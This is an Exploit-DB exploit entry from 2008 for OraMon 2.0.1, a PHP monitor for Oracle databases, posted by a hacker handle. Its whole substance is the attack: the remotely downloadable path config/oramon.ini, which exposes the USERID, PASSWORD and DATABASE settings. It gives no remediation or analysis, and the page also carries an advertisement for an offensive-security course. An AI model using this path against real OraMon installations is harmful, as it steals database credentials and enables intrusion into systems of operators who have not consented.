OraMon 2.0.1 - Remote Configuration File Disclosure

EDB-ID:

7286




Platform:

PHP

Date:

2008-11-29


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

........................

..............................................
+++++Bypass Config Download Vulnerability+++++
...............................................

script:Oramon = Oracle Database Monitoring

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
download:http://www.oramon.org/downloads/oramon.tar.gz

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
expl:

$USERID=
$PASSWORD=
$DATABASE=

www.site.com/path/config/oramon.ini

   
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  | | | | | |
Author: ahmadbady  
  | | | | | |
my mail: kivi_hacker666@yahoo.com | | | | | |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-11-29]